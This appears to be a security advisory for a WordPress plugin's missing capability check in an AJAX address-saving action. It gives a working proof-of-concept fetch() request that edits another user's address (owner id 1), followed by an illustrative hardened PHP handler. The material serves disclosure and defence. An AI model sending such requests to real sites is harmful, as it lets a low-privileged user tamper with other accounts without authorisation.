Description

The plugin does not properly validate user capabilities in some of its AJAX actions, allowing malicious users to edit other users' account addresses.
You may get the nonce from your save address form:

    fetch("https://example.com/wp-admin/admin-ajax.php", {
      "headers": {
        "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
      },
      "body": 'action=cuar_save_address_for_owner&cuar_nonce=a73a7eab3b&owner[type]=usr&owner[ids][]=1&address_id=home_address&address[name]=hohohohoh',
      "method": "POST",
      "mode": "cors",
      "credentials": "include"
    })
      .then((response) => {
        return response.text();
      })
      .then((data) => {
        console.log(data);
      });
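The missing check, shown as an added example of a hardened WordPress AJAX handler (not the plugin's own code or its actual fix). The request parameter names mirror the request above; the `demo_*` function, action, nonce action and meta key names, the use of the `edit_user` capability, and the `billing_address` entry are assumptions.

```php
<?php
// Added example: hypothetical handler, not the plugin's code.
// Registered for logged-in users only (no wp_ajax_nopriv_ hook).
add_action( 'wp_ajax_demo_save_address_for_owner', 'demo_save_address_for_owner' );

function demo_save_address_for_owner() {
    // 1. Nonce check. This only proves the request came from a form served
    //    to this session; any logged-in user can obtain a valid nonce, so it
    //    says nothing about whether the caller may edit the target account.
    check_ajax_referer( 'demo_save_address', 'cuar_nonce' );

    $owner = ( isset( $_POST['owner'] ) && is_array( $_POST['owner'] ) )
        ? wp_unslash( $_POST['owner'] ) : array();
    $type  = isset( $owner['type'] ) ? sanitize_key( $owner['type'] ) : '';
    $ids   = ( isset( $owner['ids'] ) && is_array( $owner['ids'] ) )
        ? array_map( 'absint', $owner['ids'] ) : array();

    if ( 'usr' !== $type || empty( $ids ) ) {
        wp_send_json_error( array( 'message' => 'Invalid owner.' ), 400 );
    }

    // 2. Authorization. Check every requested owner id before writing
    //    anything. 'edit_user' passes for the caller's own id and otherwise
    //    requires the right to edit that specific user.
    foreach ( $ids as $user_id ) {
        if ( ! current_user_can( 'edit_user', $user_id ) ) {
            wp_send_json_error( array( 'message' => 'Forbidden.' ), 403 );
        }
    }

    // 3. Allow-list the address slot so the request cannot pick an
    //    arbitrary meta key ('billing_address' is a constructed value).
    $allowed    = array( 'home_address', 'billing_address' );
    $address_id = isset( $_POST['address_id'] )
        ? sanitize_key( wp_unslash( $_POST['address_id'] ) ) : '';
    if ( ! in_array( $address_id, $allowed, true ) ) {
        wp_send_json_error( array( 'message' => 'Invalid address.' ), 400 );
    }

    $address = ( isset( $_POST['address'] ) && is_array( $_POST['address'] ) )
        ? array_map( 'sanitize_text_field', wp_unslash( $_POST['address'] ) )
        : array();

    foreach ( $ids as $user_id ) {
        update_user_meta( $user_id, 'demo_' . $address_id, $address );
    }
    wp_send_json_success();
}
```

With this handler, the request above sent by a low-privileged account with `owner[ids][]=1` returns a 403 before any user meta is written.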